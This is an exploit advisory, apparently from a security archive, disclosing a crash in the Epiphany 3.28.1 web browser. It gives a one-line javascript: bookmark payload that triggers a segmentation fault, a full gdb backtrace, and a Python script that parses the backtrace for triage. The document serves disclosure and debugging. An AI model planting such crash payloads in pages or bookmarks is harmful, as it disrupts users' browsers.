Epiphany Web Browser 3.28.1 Denial Of Service

Posted Aug 23, 2018
Authored by Mishra Dhiraj

Epiphany Web Browser version 3.28.1 suffers from a denial of service vulnerability.

tags | exploit, web, denial of service
MD5 | b861883dd67141c86e6d706650ff3c80

# Exploit Title: Epiphany Web Browser 3.28.1 - Denial of Service (PoC)
# Author: Dhiraj Mishra
# Date: 2018-08-23
# Software: https://projects-old.gnome.org/epiphany/
# Version: 3.28.1
# CVE: N/A
# Tested on: Ubuntu 18 64bit

# Steps to reproduce:
1. Open the Epiphany browser
2. Bookmark any random page
3. Then navigate to the bookmark properties and set:
Name = Crash
Address = javascript:window.open('javascript:document.write("<script></script>");');
4. Browse to any URL and try to open the above bookmark
5. The browser crashes

# Below backtrace for your reference.

$ gdb epiphany
GNU gdb (Ubuntu 8.1-0ubuntu3) 8.1.0.20180409-git
Copyright (C) 2018 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from epiphany...(no debugging symbols found)...done.
(gdb) r
Starting program: /usr/bin/epiphany
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
[New Thread 0x7fffe08b6700 (LWP 9295)]
[New Thread 0x7fffdee4b700 (LWP 9296)]
[New Thread 0x7fffde64a700 (LWP 9297)]
[New Thread 0x7fffdcdcf700 (LWP 9298)]
[New Thread 0x7fff8fffd700 (LWP 9299)]
[New Thread 0x7fff8f7fc700 (LWP 9300)]
[New Thread 0x7fff8effb700 (LWP 9301)]
[New Thread 0x7fff8e38b700 (LWP 9302)]
[New Thread 0x7fff8db8a700 (LWP 9303)]
[New Thread 0x7fff8d389700 (LWP 9305)]
[New Thread 0x7fff77b0a700 (LWP 9310)]
[New Thread 0x7fff7598c700 (LWP 9320)]
[New Thread 0x7fff7518b700 (LWP 9321)]
[New Thread 0x7fff7498a700 (LWP 9327)]
[New Thread 0x7fff7698c700 (LWP 9334)]
[New Thread 0x7fff5ffff700 (LWP 9335)]
[New Thread 0x7fff5f7fe700 (LWP 9336)]
[New Thread 0x7fff5effd700 (LWP 9337)]
[New Thread 0x7fff5e7fc700 (LWP 9338)]
[New Thread 0x7fff5dffb700 (LWP 9339)]
[Thread 0x7fff8db8a700 (LWP 9303) exited]
[Thread 0x7fff8e38b700 (LWP 9302) exited]
[Thread 0x7fff5e7fc700 (LWP 9338) exited]
[Thread 0x7fff7698c700 (LWP 9334) exited]
[Thread 0x7fff5f7fe700 (LWP 9336) exited]
[Thread 0x7fff5effd700 (LWP 9337) exited]
[Thread 0x7fff5dffb700 (LWP 9339) exited]
[Thread 0x7fff5ffff700 (LWP 9335) exited]
Error scanning plugin /usr/lib/mozilla/plugins/libpepflashplayer.so, /usr/lib/x86_64-linux-gnu/webkit2gtk-4.0/WebKitPluginProcess returned 256 exit status
[New Thread 0x7fff5ffff700 (LWP 9399)]
[Thread 0x7fff7498a700 (LWP 9327) exited]
[New Thread 0x7fff7498a700 (LWP 9402)]
[Thread 0x7fff7498a700 (LWP 9402) exited]

Thread 22 "pool" received signal SIGSEGV, Segmentation fault.
[Switching to Thread 0x7fff5ffff700 (LWP 9399)]
0x00007ffff7b75db7 in ?? () from /usr/lib/x86_64-linux-gnu/epiphany-browser/libephymain.so
(gdb) bt
#0 0x00007ffff7b75db7 in () at /usr/lib/x86_64-linux-gnu/epiphany-browser/libephymain.so
#1 0x00007ffff7079be6 in () at /usr/lib/x86_64-linux-gnu/libgio-2.0.so.0
#2 0x00007ffff73fe7d0 in () at /usr/lib/x86_64-linux-gnu/libglib-2.0.so.0
#3 0x00007ffff73fde05 in () at /usr/lib/x86_64-linux-gnu/libglib-2.0.so.0
#4 0x00007fffefc206db in start_thread (arg=0x7fff5ffff700) at pthread_create.c:463
#5 0x00007ffff5e4c88f in clone () at ../sysdeps/unix/sysv/linux/x86_64/clone.S:95
(gdb)
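
For triage, the backtrace above can be reduced to the faulting module and the list of modules that still need debug symbols before the crashing function can be named. The following is an added example, not part of the original advisory; `parse_frames` and `triage` are hypothetical helper names, and the sample input is the `bt` output copied from the session above.

```python
import re

# Frames copied from the gdb "bt" output shown on this page.
SAMPLE_BT = """\
#0 0x00007ffff7b75db7 in () at /usr/lib/x86_64-linux-gnu/epiphany-browser/libephymain.so
#1 0x00007ffff7079be6 in () at /usr/lib/x86_64-linux-gnu/libgio-2.0.so.0
#2 0x00007ffff73fe7d0 in () at /usr/lib/x86_64-linux-gnu/libglib-2.0.so.0
#3 0x00007ffff73fde05 in () at /usr/lib/x86_64-linux-gnu/libglib-2.0.so.0
#4 0x00007fffefc206db in start_thread (arg=0x7fff5ffff700) at pthread_create.c:463
#5 0x00007ffff5e4c88f in clone () at ../sysdeps/unix/sysv/linux/x86_64/clone.S:95
"""

FRAME_RE = re.compile(
    r"^#(?P<idx>\d+)\s+(?P<pc>0x[0-9a-fA-F]+)\s+in\s+"
    r"(?P<func>[^\s(]+)?\s*\((?P<args>[^)]*)\)\s+(?:at|from)\s+(?P<where>\S+)$"
)

def parse_frames(text):
    frames = []
    for line in text.splitlines():
        m = FRAME_RE.match(line.strip())
        if not m:
            continue  # skip prompts, thread notices and other gdb chatter
        func, where = m.group("func"), m.group("where")
        frames.append({
            "index": int(m.group("idx")),
            "pc": int(m.group("pc"), 16),
            "function": None if func in (None, "??") else func,
            "location": where,
            "is_shared_object": bool(re.search(r"\.so(\.\d+)*$", where)),
        })
    return frames

def triage(text):
    frames = parse_frames(text)
    if not frames:
        raise ValueError("no backtrace frames found")
    missing = []  # modules whose frames have no function name, innermost first
    for f in frames:
        if f["function"] is None and f["location"] not in missing:
            missing.append(f["location"])
    return {
        "faulting_module": frames[0]["location"],
        "faulting_pc": frames[0]["pc"],
        "needs_debug_symbols": missing,
    }

if __name__ == "__main__":
    print(triage(SAMPLE_BT))
```

On this backtrace the faulting frame is in `libephymain.so` and is unsymbolized, as are the GIO and GLib frames beneath it, so the trace has to be regenerated with debug symbols for those three libraries before the crashing function can be identified.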
